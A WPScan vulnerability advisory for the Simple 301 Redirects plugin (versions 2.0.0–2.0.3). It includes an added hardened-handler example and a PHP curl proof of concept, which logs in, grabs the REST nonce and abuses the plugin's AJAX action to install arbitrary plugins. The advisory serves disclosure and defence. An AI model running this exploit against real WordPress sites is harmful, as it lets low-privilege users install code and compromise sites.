wpvulndb | Chloe Chamberland | WPVDB-ID: 8638B36C-6641-491F-B9DF-5DB3645E4668
History: May 26, 2021 - 12:00 a.m.

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Arbitrary Plugin Installation

2021-05-26 00:00:00
Chloe Chamberland
wpscan.com

EPSS: 0.001 (Low) | Percentile: 44.7%

A lack of capability checks and an insufficient nonce check on the plugin's AJAX action made it possible for any authenticated user to install arbitrary plugins on vulnerable sites.
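As an added illustration of the defect class described above (not the plugin's own code, and not part of this record), the weak pattern is shown beside a hardened handler: the generic wp_rest nonce, obtainable by any logged-in user, is accepted as the only gate, versus a handler that requires the install_plugins capability and a nonce bound to its own action. Names prefixed bl_example_ are hypothetical; the core WordPress functions are real.

```php
<?php
// Added example, not the plugin's code. wp_ajax_* hooks are reachable by every
// logged-in user, so the handler itself must enforce capability and a per-action nonce.

// Weak pattern implied by the description: the site-wide REST nonce (fetched from
// admin-ajax.php?action=rest-nonce by any authenticated user) is the only check, and
// no capability is verified, so a subscriber-level account reaches the install code.
function bl_example_install_plugin_weak() {
    check_ajax_referer( 'wp_rest', 'security' );    // any logged-in user passes this
    $slug = sanitize_key( $_POST['slug'] ?? '' );
    wp_send_json_success( bl_example_do_install( $slug ) );
}

// Hardened pattern: capability first, then a nonce minted for this specific action.
function bl_example_install_plugin_hardened() {
    // 1. Authorization: only users who may install plugins get any further.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( 'insufficient_permissions', 403 );
    }
    // 2. CSRF: nonce must have been created for this action (see bl_example_nonce()),
    //    not the generic 'wp_rest' action; on failure check_ajax_referer() dies with -1.
    check_ajax_referer( 'bl_example_install_plugin', 'security' );

    $slug = sanitize_key( $_POST['slug'] ?? '' );
    if ( '' === $slug ) {
        wp_send_json_error( 'missing_slug', 400 );
    }
    wp_send_json_success( bl_example_do_install( $slug ) );
}
add_action( 'wp_ajax_bl_example_install_plugin', 'bl_example_install_plugin_hardened' );

// Nonce handed to the admin screen that legitimately triggers the install.
function bl_example_nonce() {
    return wp_create_nonce( 'bl_example_install_plugin' );
}

// Install a plugin from the wordpress.org directory by slug using core upgrader APIs.
function bl_example_do_install( $slug ) {
    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $api = plugins_api( 'plugin_information', array(
        'slug'   => $slug,
        'fields' => array( 'sections' => false ),
    ) );
    if ( is_wp_error( $api ) ) {
        return $api->get_error_message();
    }
    $upgrader = new Plugin_Upgrader( new Automatic_Upgrader_Skin() );
    return $upgrader->install( $api->download_link );
}
```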

PoC

    $wp_user,
    'pwd' => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

echo 'Getting REST API Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

// Rest Nonce
preg_match('/([^"]+)/', $content, $matches);
$restnonce = $matches[1];
echo $restnonce;

echo 'Installing Plugin!';
// Installing Plugin
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action'   => 'simple301redirects/admin/install_plugin',
    'security' => $restnonce,
    'slug'     => 'jetpack',
]);
$output = curl_exec($ch);
curl_close($ch);
print($output);
?>

CPE Name              Operator  Version
simple-301-redirects  lt        2.0.4
